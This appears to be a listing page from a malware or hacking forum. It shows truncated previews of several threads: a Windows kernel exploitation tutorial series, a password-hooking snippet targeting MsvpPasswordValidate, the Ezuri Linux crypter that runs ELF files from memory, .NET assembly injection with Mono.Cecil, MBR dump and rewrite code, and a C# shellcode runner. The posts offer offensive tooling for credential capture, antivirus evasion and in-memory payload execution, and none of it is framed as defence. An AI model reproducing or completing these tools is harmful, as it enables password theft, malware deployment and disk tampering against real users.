Tags
Author: SWaNk - Replies: 0 - Views: 1417
Starting with Windows Kernel Exploitation
[Image: https://camo.githubusercontent.com/ab469...342e706e67]


Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver

Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token

Links:
[hide]
[url=https://hshrzd.word
Author: regasmx86 - Replies: 0 - Views: 1403
[Windows] Password Hooking with MsvpPasswordValidate
[hide]
PasswdHook.c

[code]#include "common.h"

static
BOOLEAN
MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
      NETLOGON_LOGON_INFO_CLASS LogonLevel,
      PVOID LogonInformation,
      PUSER_INTERNAL1_INFORMATION Passwords,
      PULONG UserFlags,
      PUSER_SESSION_KEY UserSessionKey,
      PVOID LmSessionKey
      )
{
return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
UasCompatibilityRequired,
LogonLevel,
LogonInformation
Author: TMZ - Replies: 0 - Views: 1718
Ezuri: Linux runtime crypter with memfd_create
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel version is >= 3.17 (relies on the memfd_create syscall).

aes.go
[hide]
[code]
package main

import (
"crypto/aes"
"crypto/cipher"
)

func aesEnc(srcBytes []byte, key string, iv string) []byte {
block, err := aes.NewCipher([]byte(key))
check(err)

encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
encrypted := make([]byte, len(srcBytes))
Author: TMZ - Replies: 1 - Views: 1497
Injection with Mono.Cecil
This may not be news for everyone but I find it interesting. Mono.Cecil is a impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:

A dummy C# application like the one below, compile it to get it’s executable file, that’s what we need:

[hide]
[code]
using System;

namespace Dummy
{
class Program
{
public static v
Author: TMZ - Replies: 0 - Views: 1239
MBR Dump With .NET
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.

[hide]
[code]
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;

namespace MBR
{
class MainClass
{

[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern uint SetFilePointer(
[In] SafeFileHandle hFile,
[In] int lDistanceToMove,
[Out] out int lpDis
Author: regasmx86 - Replies: 0 - Views: 2264
Shellcode execution with C#
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }

[hide]
[code]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace Net_Shellcode_Execution
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern